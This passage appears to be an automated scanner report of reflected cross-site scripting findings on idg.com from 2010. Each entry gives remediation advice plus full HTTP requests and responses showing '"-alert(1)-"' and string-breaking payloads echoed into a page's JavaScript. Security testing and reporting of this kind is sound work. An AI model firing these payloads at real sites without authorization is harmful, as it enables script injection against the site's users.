HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:26 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5015 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /wwwa2b5c";82c384e1acd/homenew.nsf/screen2.css"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4760c"%3b8023bed7ea3 was submitted in the REST URL parameter 3. This input was echoed as 4760c";8023bed7ea3 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/homenew.nsf/screen2.css4760c"%3b8023bed7ea3 HTTP/1.1 Host: idg.com Proxy-Connection: keep-alive Referer: http://idg.com/www/homenew.nsf/home?readform Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:27 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5015 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/screen2.css4760c";8023bed7ea3"); } catch(err) {}</script> ...[SNIP]...
2.223. http://idg.com/www/homenew.nsf/screen2.css [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://idg.com
Path:
/www/homenew.nsf/screen2.css
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2632b"-alert(1)-"260996669dd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/homenew.nsf/screen2.css?2632b"-alert(1)-"260996669dd=1 HTTP/1.1 Host: idg.com Proxy-Connection: keep-alive Referer: http://idg.com/www/homenew.nsf/home?readform Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1
Response
HTTP/1.1 400 Bad Request Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:26 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5028 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/screen2.css?2632b"-alert(1)-"260996669dd=1"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc914"%3bfa7c65a210d was submitted in the REST URL parameter 1. This input was echoed as fc914";fa7c65a210d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /wwwfc914"%3bfa7c65a210d/homenew.nsf/style.css HTTP/1.1 Host: idg.com Proxy-Connection: keep-alive Referer: http://idg.com/www/homenew.nsf/home?readform Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:27 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5013 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /wwwfc914";fa7c65a210d/homenew.nsf/style.css"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9916"%3b0b3e1cac903 was submitted in the REST URL parameter 3. This input was echoed as f9916";0b3e1cac903 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/homenew.nsf/style.cssf9916"%3b0b3e1cac903 HTTP/1.1 Host: idg.com Proxy-Connection: keep-alive Referer: http://idg.com/www/homenew.nsf/home?readform Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:28 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5013 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/style.cssf9916";0b3e1cac903"); } catch(err) {}</script> ...[SNIP]...
2.226. http://idg.com/www/homenew.nsf/style.css [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://idg.com
Path:
/www/homenew.nsf/style.css
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65115"-alert(1)-"7b51d567050 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/homenew.nsf/style.css?65115"-alert(1)-"7b51d567050=1 HTTP/1.1 Host: idg.com Proxy-Connection: keep-alive Referer: http://idg.com/www/homenew.nsf/home?readform Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1
Response
HTTP/1.1 400 Bad Request Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:27 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5026 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/style.css?65115"-alert(1)-"7b51d567050=1"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65557"%3b483e735cb63 was submitted in the REST URL parameter 1. This input was echoed as 65557";483e735cb63 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www65557"%3b483e735cb63/homenew.nsf/swfobject.js HTTP/1.1 Host: idg.com Proxy-Connection: keep-alive Referer: http://idg.com/www/homenew.nsf/home?readform Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:38 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5016 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www65557";483e735cb63/homenew.nsf/swfobject.js"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f344"%3b7bb8563c282 was submitted in the REST URL parameter 3. This input was echoed as 2f344";7bb8563c282 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/homenew.nsf/swfobject.js2f344"%3b7bb8563c282 HTTP/1.1 Host: idg.com Proxy-Connection: keep-alive Referer: http://idg.com/www/homenew.nsf/home?readform Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:38 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5016 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/swfobject.js2f344";7bb8563c282"); } catch(err) {}</script> ...[SNIP]...
2.229. http://idg.com/www/homenew.nsf/swfobject.js [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://idg.com
Path:
/www/homenew.nsf/swfobject.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0de4"-alert(1)-"fcc60ddb84 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/homenew.nsf/swfobject.js?a0de4"-alert(1)-"fcc60ddb84=1 HTTP/1.1 Host: idg.com Proxy-Connection: keep-alive Referer: http://idg.com/www/homenew.nsf/home?readform Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1
Response
HTTP/1.1 400 Bad Request Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:37 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5028 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/swfobject.js?a0de4"-alert(1)-"fcc60ddb84=1"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2d84b"%3bec78c03d4d3 was submitted in the REST URL parameter 1. This input was echoed as 2d84b";ec78c03d4d3 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www2d84b"%3bec78c03d4d3/homenew.nsf/tabs.css HTTP/1.1 Host: idg.com Proxy-Connection: keep-alive Referer: http://idg.com/www/homenew.nsf/home?readform Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:30 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5012 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www2d84b";ec78c03d4d3/homenew.nsf/tabs.css"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6cb7c"%3b884c5baffb3 was submitted in the REST URL parameter 3. This input was echoed as 6cb7c";884c5baffb3 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/homenew.nsf/tabs.css6cb7c"%3b884c5baffb3 HTTP/1.1 Host: idg.com Proxy-Connection: keep-alive Referer: http://idg.com/www/homenew.nsf/home?readform Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:32 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5012 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/tabs.css6cb7c";884c5baffb3"); } catch(err) {}</script> ...[SNIP]...
2.232. http://idg.com/www/homenew.nsf/tabs.css [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://idg.com
Path:
/www/homenew.nsf/tabs.css
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a98c2"-alert(1)-"0fa26d0ed6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/homenew.nsf/tabs.css?a98c2"-alert(1)-"0fa26d0ed6d=1 HTTP/1.1 Host: idg.com Proxy-Connection: keep-alive Referer: http://idg.com/www/homenew.nsf/home?readform Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1
Response
HTTP/1.1 400 Bad Request Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:29 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5025 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/tabs.css?a98c2"-alert(1)-"0fa26d0ed6d=1"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11302"%3b713a0a694b9 was submitted in the REST URL parameter 1. This input was echoed as 11302";713a0a694b9 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www11302"%3b713a0a694b9/idgproducts.nsf/2010mklanding.html HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:01:03 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5026 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www11302";713a0a694b9/idgproducts.nsf/2010mklanding.html"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b5e4"%3bdd15fff9613 was submitted in the REST URL parameter 3. This input was echoed as 3b5e4";dd15fff9613 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/idgproducts.nsf/2010mklanding.html3b5e4"%3bdd15fff9613 HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:01:03 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5026 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/idgproducts.nsf/2010mklanding.html3b5e4";dd15fff9613"); } catch(err) {}</script> ...[SNIP]...
2.235. http://idg.com/www/idgproducts.nsf/2010mklanding.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://idg.com
Path:
/www/idgproducts.nsf/2010mklanding.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2a606"-alert(1)-"6588e540550 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/idgproducts.nsf/2010mklanding.html?2a606"-alert(1)-"6588e540550=1 HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 400 Bad Request Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:01:02 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5039 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/idgproducts.nsf/2010mklanding.html?2a606"-alert(1)-"6588e540550=1"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 69e6d"%3b73cbff7633e was submitted in the REST URL parameter 1. This input was echoed as 69e6d";73cbff7633e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www69e6d"%3b73cbff7633e/idgproducts.nsf/countries HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:01:08 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5017 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www69e6d";73cbff7633e/idgproducts.nsf/countries"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d857"%3b7485e1d876f was submitted in the REST URL parameter 3. This input was echoed as 5d857";7485e1d876f in the application's response.
